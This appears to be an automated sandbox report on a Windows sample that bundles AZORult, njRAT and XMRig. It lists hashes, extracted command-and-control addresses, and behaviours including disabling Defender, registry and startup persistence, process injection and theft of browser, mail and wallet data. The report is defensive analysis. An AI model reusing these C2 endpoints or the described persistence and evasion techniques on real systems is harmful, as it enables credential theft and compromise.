azorult | 6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929

Analysis

max time kernel
151s
max time network
140s
platform
windows10_x64
resource
win10-en-20211208
submitted
10-01-2022 21:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe
Size

24.0MB
MD5

e11fa56349781d01080d0baba6367758
SHA1

6214bdca82fa0e54a75de181fd1ed95dffdaf35a
SHA256

6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929
SHA512

1e99d322bb33346db00d9ba4ac0a6deb19830b02d3d4f98aee5461b2bbf99d02831b1079daed9d44307c261084a6864a4242a352aa12590b265941002de65f64

Score

10^/10

azorult njrat xmrig hacked collection discovery evasion infostealer miner persistence spyware stealer trojan

Malware Config

Extracted

Family

azorult

http://195.245.112.115/index.php

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

172.94.18.243:3001

Mutex

79402713f13d898b624bf5785b7dd5e5

Attributes

reg_key
79402713f13d898b624bf5785b7dd5e5
splitter
|'|'|

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Contains code to disable Windows Defender 4 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\WINDOWS.EXE	disable_win_def
C:\Users\Admin\AppData\Local\Temp\WINDOWS.EXE	disable_win_def
behavioral2/memory/2932-139-0x00000000009E0000-0x00000000009E8000-memory.dmp	disable_win_def
behavioral2/memory/2932-138-0x00000000009E0000-0x00000000009E8000-memory.dmp	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/2588-1105-0x0000000140310068-mapping.dmp	xmrig

Executes dropped EXE 13 IoCs

Processes:

CHROME UPDATE.EXECHROME.EXEGOOGLE CHROME.EXENOTEPAD.EXESVCHOST.EXEWINDOWS UPDATE.EXEWINDOWS.EXEserver.exesihost64.exeservicesupdate.exeservices.exesihost64.exesihost64.exe

pid	process
3164	CHROME UPDATE.EXE
2728	CHROME.EXE
696	GOOGLE CHROME.EXE
3836	NOTEPAD.EXE
4084	SVCHOST.EXE
500	WINDOWS UPDATE.EXE
2932	WINDOWS.EXE
3212	server.exe
2164	sihost64.exe
2592	servicesupdate.exe
428	services.exe
5060	sihost64.exe
3900	sihost64.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Drops startup file 4 IoCs

Processes:

SVCHOST.EXEserver.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SVCHOST.EXE	SVCHOST.EXE
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SVCHOST.EXE	SVCHOST.EXE
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79402713f13d898b624bf5785b7dd5e5.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79402713f13d898b624bf5785b7dd5e5.exe	server.exe

Loads dropped DLL 4 IoCs

Processes:

GOOGLE CHROME.EXE

pid process

696 GOOGLE CHROME.EXE
696 GOOGLE CHROME.EXE
696 GOOGLE CHROME.EXE
696 GOOGLE CHROME.EXE
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
696	GOOGLE CHROME.EXE
696	GOOGLE CHROME.EXE
696	GOOGLE CHROME.EXE
696	GOOGLE CHROME.EXE

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

GOOGLE CHROME.EXE

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	GOOGLE CHROME.EXE
Key opened	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	GOOGLE CHROME.EXE
Key opened	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	GOOGLE CHROME.EXE

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

SVCHOST.EXEserver.exeNOTEPAD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Skype Web = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\SVCHOST.EXE"	SVCHOST.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\79402713f13d898b624bf5785b7dd5e5 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\79402713f13d898b624bf5785b7dd5e5 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services.exe = "C:\\Users\\Admin\\Services.exe"	NOTEPAD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Store = "C:\\Users\\Admin\\AppData\\Local\\Temp\\SVCHOST.EXE"	SVCHOST.EXE

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 4 IoCs

Processes:

powershell.EXEpowershell.EXE

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE

Suspicious use of SetThreadContext 2 IoCs

Processes:

CHROME.EXEservices.exe

description	pid	process	target process
PID 2728 set thread context of 3996	2728	CHROME.EXE	nslookup.exe
PID 428 set thread context of 2588	428	services.exe	nslookup.exe

Drops file in Windows directory 4 IoCs

Processes:

nslookup.exe

description	ioc	process
File created	C:\Windows\Tasks\nslooksvc32.job	nslookup.exe
File opened for modification	C:\Windows\Tasks\nslooksvc32.job	nslookup.exe
File created	C:\Windows\Tasks\nslooksvc64.job	nslookup.exe
File opened for modification	C:\Windows\Tasks\nslooksvc64.job	nslookup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

GOOGLE CHROME.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	GOOGLE CHROME.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	GOOGLE CHROME.EXE

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1484 schtasks.exe
4532 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4388 timeout.exe

pid	process
1484	schtasks.exe
4532	schtasks.exe

pid	process
4388	timeout.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

SVCHOST.EXE

pid process

4084 SVCHOST.EXE

pid	process
4084	SVCHOST.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeNOTEPAD.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execmd.exepowershell.exeGOOGLE CHROME.EXEpowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
976	powershell.exe
976	powershell.exe
976	powershell.exe
3836	NOTEPAD.EXE
3836	NOTEPAD.EXE
3836	NOTEPAD.EXE
3836	NOTEPAD.EXE
3836	NOTEPAD.EXE
3836	NOTEPAD.EXE
3836	NOTEPAD.EXE
3836	NOTEPAD.EXE
3836	NOTEPAD.EXE
3836	NOTEPAD.EXE
3836	NOTEPAD.EXE
3836	NOTEPAD.EXE
3836	NOTEPAD.EXE
3836	NOTEPAD.EXE
1388	powershell.exe
2388	powershell.exe
1040	powershell.exe
2088	powershell.exe
740	powershell.exe
3784	powershell.exe
3836	NOTEPAD.EXE
2988	cmd.exe
2988	cmd.exe
1388	powershell.exe
1388	powershell.exe
3848	powershell.exe
3848	powershell.exe
2388	powershell.exe
2388	powershell.exe
696	GOOGLE CHROME.EXE
696	GOOGLE CHROME.EXE
4080	powershell.exe
4080	powershell.exe
3020	powershell.exe
3020	powershell.exe
1040	powershell.exe
1040	powershell.exe
8	powershell.exe
8	powershell.exe
2088	powershell.exe
2088	powershell.exe
2176	powershell.exe
2176	powershell.exe
1388	powershell.exe
2988	cmd.exe
3784	powershell.exe
3784	powershell.exe
2388	powershell.exe
740	powershell.exe
740	powershell.exe
3848	powershell.exe
1040	powershell.exe
2088	powershell.exe
3020	powershell.exe
4080	powershell.exe
2988	cmd.exe
8	powershell.exe
2176	powershell.exe
740	powershell.exe
3784	powershell.exe
3848	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

620

pid	process
620

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeNOTEPAD.EXEpowershell.exepowershell.exepowershell.exepowershell.execmd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	976	powershell.exe
Token: SeDebugPrivilege	3836	NOTEPAD.EXE
Token: SeIncreaseQuotaPrivilege	976	powershell.exe
Token: SeSecurityPrivilege	976	powershell.exe
Token: SeTakeOwnershipPrivilege	976	powershell.exe
Token: SeLoadDriverPrivilege	976	powershell.exe
Token: SeSystemProfilePrivilege	976	powershell.exe
Token: SeSystemtimePrivilege	976	powershell.exe
Token: SeProfSingleProcessPrivilege	976	powershell.exe
Token: SeIncBasePriorityPrivilege	976	powershell.exe
Token: SeCreatePagefilePrivilege	976	powershell.exe
Token: SeBackupPrivilege	976	powershell.exe
Token: SeRestorePrivilege	976	powershell.exe
Token: SeShutdownPrivilege	976	powershell.exe
Token: SeDebugPrivilege	976	powershell.exe
Token: SeSystemEnvironmentPrivilege	976	powershell.exe
Token: SeRemoteShutdownPrivilege	976	powershell.exe
Token: SeUndockPrivilege	976	powershell.exe
Token: SeManageVolumePrivilege	976	powershell.exe
Token: 33	976	powershell.exe
Token: 34	976	powershell.exe
Token: 35	976	powershell.exe
Token: 36	976	powershell.exe
Token: SeDebugPrivilege	1388	powershell.exe
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeDebugPrivilege	1040	powershell.exe
Token: SeDebugPrivilege	2088	powershell.exe
Token: SeDebugPrivilege	2988	cmd.exe
Token: SeDebugPrivilege	740	powershell.exe
Token: SeDebugPrivilege	3784	powershell.exe
Token: SeDebugPrivilege	3848	powershell.exe
Token: SeDebugPrivilege	4080	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	8	powershell.exe
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeIncreaseQuotaPrivilege	1388	powershell.exe
Token: SeSecurityPrivilege	1388	powershell.exe
Token: SeTakeOwnershipPrivilege	1388	powershell.exe
Token: SeLoadDriverPrivilege	1388	powershell.exe
Token: SeSystemProfilePrivilege	1388	powershell.exe
Token: SeSystemtimePrivilege	1388	powershell.exe
Token: SeProfSingleProcessPrivilege	1388	powershell.exe
Token: SeIncBasePriorityPrivilege	1388	powershell.exe
Token: SeCreatePagefilePrivilege	1388	powershell.exe
Token: SeBackupPrivilege	1388	powershell.exe
Token: SeRestorePrivilege	1388	powershell.exe
Token: SeShutdownPrivilege	1388	powershell.exe
Token: SeDebugPrivilege	1388	powershell.exe
Token: SeSystemEnvironmentPrivilege	1388	powershell.exe
Token: SeRemoteShutdownPrivilege	1388	powershell.exe
Token: SeUndockPrivilege	1388	powershell.exe
Token: SeManageVolumePrivilege	1388	powershell.exe
Token: 33	1388	powershell.exe
Token: 34	1388	powershell.exe
Token: 35	1388	powershell.exe
Token: 36	1388	powershell.exe
Token: SeIncreaseQuotaPrivilege	2388	powershell.exe
Token: SeSecurityPrivilege	2388	powershell.exe
Token: SeTakeOwnershipPrivilege	2388	powershell.exe
Token: SeLoadDriverPrivilege	2388	powershell.exe
Token: SeSystemProfilePrivilege	2388	powershell.exe
Token: SeSystemtimePrivilege	2388	powershell.exe
Token: SeProfSingleProcessPrivilege	2388	powershell.exe
Token: SeIncBasePriorityPrivilege	2388	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exeWINDOWS.EXEWINDOWS UPDATE.EXENOTEPAD.EXEGOOGLE CHROME.EXEserver.execmd.exeCHROME UPDATE.EXECHROME.EXEcmd.execmd.exe

description	pid	process	target process
PID 2688 wrote to memory of 3164	2688	6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe	CHROME UPDATE.EXE
PID 2688 wrote to memory of 3164	2688	6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe	CHROME UPDATE.EXE
PID 2688 wrote to memory of 2728	2688	6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe	CHROME.EXE
PID 2688 wrote to memory of 2728	2688	6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe	CHROME.EXE
PID 2688 wrote to memory of 696	2688	6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe	GOOGLE CHROME.EXE
PID 2688 wrote to memory of 696	2688	6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe	GOOGLE CHROME.EXE
PID 2688 wrote to memory of 696	2688	6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe	GOOGLE CHROME.EXE
PID 2688 wrote to memory of 3836	2688	6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe	NOTEPAD.EXE
PID 2688 wrote to memory of 3836	2688	6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe	NOTEPAD.EXE
PID 2688 wrote to memory of 4084	2688	6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe	SVCHOST.EXE
PID 2688 wrote to memory of 4084	2688	6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe	SVCHOST.EXE
PID 2688 wrote to memory of 4084	2688	6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe	SVCHOST.EXE
PID 2688 wrote to memory of 500	2688	6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe	WINDOWS UPDATE.EXE
PID 2688 wrote to memory of 500	2688	6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe	WINDOWS UPDATE.EXE
PID 2688 wrote to memory of 500	2688	6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe	WINDOWS UPDATE.EXE
PID 2688 wrote to memory of 2932	2688	6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe	WINDOWS.EXE
PID 2688 wrote to memory of 2932	2688	6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe	WINDOWS.EXE
PID 2932 wrote to memory of 976	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 976	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 1388	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 1388	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 2388	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 2388	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 1040	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 1040	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 2088	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 2088	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 2988	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 2988	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 740	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 740	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 3784	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 3784	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 3848	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 3848	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 4080	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 4080	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 3020	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 3020	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 8	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 8	2932	WINDOWS.EXE	powershell.exe
PID 500 wrote to memory of 3212	500	WINDOWS UPDATE.EXE	server.exe
PID 500 wrote to memory of 3212	500	WINDOWS UPDATE.EXE	server.exe
PID 500 wrote to memory of 3212	500	WINDOWS UPDATE.EXE	server.exe
PID 2932 wrote to memory of 2176	2932	WINDOWS.EXE	powershell.exe
PID 2932 wrote to memory of 2176	2932	WINDOWS.EXE	powershell.exe
PID 3836 wrote to memory of 2164	3836	NOTEPAD.EXE	sihost64.exe
PID 3836 wrote to memory of 2164	3836	NOTEPAD.EXE	sihost64.exe
PID 696 wrote to memory of 4740	696	GOOGLE CHROME.EXE	cmd.exe
PID 696 wrote to memory of 4740	696	GOOGLE CHROME.EXE	cmd.exe
PID 696 wrote to memory of 4740	696	GOOGLE CHROME.EXE	cmd.exe
PID 3212 wrote to memory of 4120	3212	server.exe	netsh.exe
PID 3212 wrote to memory of 4120	3212	server.exe	netsh.exe
PID 3212 wrote to memory of 4120	3212	server.exe	netsh.exe
PID 4740 wrote to memory of 4388	4740	cmd.exe	timeout.exe
PID 4740 wrote to memory of 4388	4740	cmd.exe	timeout.exe
PID 4740 wrote to memory of 4388	4740	cmd.exe	timeout.exe
PID 3164 wrote to memory of 4472	3164	CHROME UPDATE.EXE	cmd.exe
PID 3164 wrote to memory of 4472	3164	CHROME UPDATE.EXE	cmd.exe
PID 2728 wrote to memory of 4812	2728	CHROME.EXE	cmd.exe
PID 2728 wrote to memory of 4812	2728	CHROME.EXE	cmd.exe
PID 4812 wrote to memory of 908	4812	cmd.exe	powershell.exe
PID 4812 wrote to memory of 908	4812	cmd.exe	powershell.exe
PID 4472 wrote to memory of 4132	4472	cmd.exe	powershell.exe

outlook_office_path 1 IoCs

Processes:

GOOGLE CHROME.EXE

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	GOOGLE CHROME.EXE

outlook_win_path 1 IoCs

Processes:

GOOGLE CHROME.EXE

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	GOOGLE CHROME.EXE

C:\Users\Admin\AppData\Local\Temp\6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe
"C:\Users\Admin\AppData\Local\Temp\6fe04c8791ef39d3256b229ecb5e574d450e8c0e59300c32658e940880aa2929.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2688

C:\Users\Admin\AppData\Local\Temp\CHROME UPDATE.EXE
"C:\Users\Admin\AppData\Local\Temp\CHROME UPDATE.EXE"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3164

C:\Windows\SYSTEM32\cmd.exe
